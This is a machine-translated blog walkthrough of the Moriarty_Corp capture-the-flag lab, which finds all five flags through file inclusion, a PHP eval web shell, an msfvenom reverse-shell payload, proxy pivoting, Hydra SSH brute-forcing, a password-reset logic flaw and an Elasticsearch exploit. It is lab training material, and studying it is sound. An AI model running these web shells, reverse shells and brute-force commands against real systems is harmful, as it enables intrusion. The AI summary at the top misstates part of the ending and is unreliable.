Suchen

Suchen

OvO
HomeArchives

Moriarty_Corp

57
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
The document outlines a penetration testing scenario involving a network with various machines and vulnerabilities. The attacker, using Kali Linux, discovers a target machine (192.168.56.101) and performs network scanning and port scanning, identifying open ports (22, 8000, 9000). Exploiting a file inclusion vulnerability, the attacker uploads a web shell and retrieves the first flag: `flag{the_game_is_on}`. After submission, the attacker is informed of an internal network (172.17.0.3-254) and begins further penetration testing. The attacker creates and uploads a reverse shell using Metasploit, gains access to the internal network, and scans for services. They discover a file upload vulnerability on 172.17.0.4, use Burp Suite for password cracking, and successfully upload another web shell to retrieve the second flag: `flag{picture_is_worth_1000_words}`. After submitting this flag, the attacker receives new credentials and is prompted to exploit an SSH service on 172.17.0.10. Using Hydra for password cracking, they obtain the credentials (root: weapons) and log in via SSH to retrieve the third flag: `flag{what_weapons}`. The document concludes with a hint about potential services running on ports 443, 8000, and 80.
External IPInternal IP
Attacker Kali192.168.56.102/
MoriartyCorp192.168.56.101172.17.0.3
File upload on port 80/172.17.0.4
Remote connection on port 22/172.17.0.10
Password change on port 8000/172.17.0.11
Exploit on port 9200/172.17.0.12

image

Network Topology Diagram

First flag:#

Host discovery:

192.168.56.101 is the target host

Nmap -sn -PR -T4 192.168.56.0/24

image

Port scanning:

Nmap -p- -A 192.168.56.101

image

Open ports: 22, 8000, 9000

Port access:

8000:

image

9000:

image

Suspected file inclusion vulnerability

image

192.168.56.101/?file=../../../../../../../etc/passwd

Path traversal vulnerability exists

image

Build a one-liner web shell file on Kali and start the HTTP service.

<?php @eval($_POST[‘hack’];?>

Python -m http.server 80

image

image

Remote access to the web shell file:

192.168.56.101/?file=http://192.168.56.102:80

image

AntSword online:
image

image

Obtained the first flag:

flag{the_game_is_on}

image

image
After submitting the flag, received a new hint, the internal network environment is: 172.17.0.3-254

Begin internal network penetration.

Second flag:#

image

image
Create and upload a trojan file using Msf:

Upload the trojan and start internal network penetration

Msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.56.102 lport=6666 -f elf > hack.elf

image

image

Start listening with Msf

Use exploit/multi/handler

Set payload linux/x64/meterpreter/reverse_tcp

Set lhost 192.168.56.102

Set lport 6666

exploit

image

Grant permissions to the trojan file on the target machine and execute:

Chmod 777 hack.elf

./hack.elf

image

image

image

Add internal network route:

Run autoroute -s 172.17.0.0/24

image

Start Msf socks proxy:

Bg

Use auxiliary/server/socks_proxy

Set srvhost 127.0.0.1

Set srvhost 1080

Run

Also modify the proxychains file

Vim /etc/proxychains4.conf

Socks5 127.0.0.1 1080

image
Scan the internal network's port 80:

Proxychains4 nmap 172.17.0.0/24 -sV -sT -Pn -T4 -p80

image

image
Access 172.17.0.4:80

Found that file upload is possible, but requires a password. Attempt to use Burp Suite to capture packets for password brute-forcing:
image
Set up proxy service in Firefox:
image
Set up socks proxy in Burp Suite:
image
Start capturing packets, based on the returned length, the password is found.
image
Upload a one-liner web shell to the target machine and access that shell file:
image

image
Set up socks5 proxy on China AntSword:
image
Go online with AntSword:
image

image
Obtain the second flag:

flag{picture_is_worth_1000_words}

image
After submitting the flag, received a new hint:

Obtained some usernames and MD5 encrypted passwords, and prompted to try using SSH for attack.

Third flag:#

image

image
Scan the internal network for the target machine with port 22 open:

Found host 172.17.0.10:22

Proxychains4 nmap -sV -sT -Pn -p22 172.17.0.0/24

image
Use Kali's built-in Hydra for password brute-forcing:

Proxychains4 hydra -L username.txt -P password.txt ssh://172.17.0.10

Successfully cracked the account and password:

root weapons

image

image
SSH login to 172.17.0.10 and obtain the third flag:

Proxychains4 ssh root@172.17.0.10

flag{what_weapons}

image
After submitting the flag, received a new hint:

New username and password, and prompted that chat services may be open on ports 443, 8000, 8080, 8888
image

Fourth flag:#

Conduct a port scan on the internal network:

Proxychains4 nmap 172.17.0.0/24 -sV -sT -Pn -T4 -p443,8000,8080

Found host: 172.17.0.11:8000
image
Access 172.17.0.11:8000 shows a login is required, log in with the given username and password:

Username: buyer13

Password: arms13

image
Found that the password can be changed, possibly a logic vulnerability for arbitrary password modification, use Burp Suite to capture packets and attempt to modify the password for admin:
image

image

image

image

image
Log in again, use admin to log in, successfully logged in:
image

image
Obtain the flag:

flag{on_the_move}

image

After submitting the flag, received a new hint:

Used Elasticsearch, usually runs on port 9200.

Elasticsearch is an open-source, highly scalable distributed full-text search engine that listens on port 9200 by default.

Fifth flag:#

image

Conduct a port scan on the internal network for port 9200:

Proxychains4 nmap 172.17.0.0/24 -sV -sT -Pn -T4 -p9200

Found host: 172.17.0.12:9200

image

image

Use Kali to search for exploitable code related to Elasticsearch:

Searchsploit -t Elasticsearch

Cp /usr/share/exploitdb/exploits/linux/remote/36337.py /home/kali/Desktop

image

image

Attack 172.17.0.12:9200:

Proxychains4 python 36337.py 172.17.0.12

Successfully obtained the last flag:

flag{game_over}

image

image
After submitting the last flag, the target environment indicates that the IP has been banned and cannot be accessed again.
image
Thus, the results conclude the penetration of the target environment.

If you have any questions, feel free to consult:
ace@pomeow.com

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.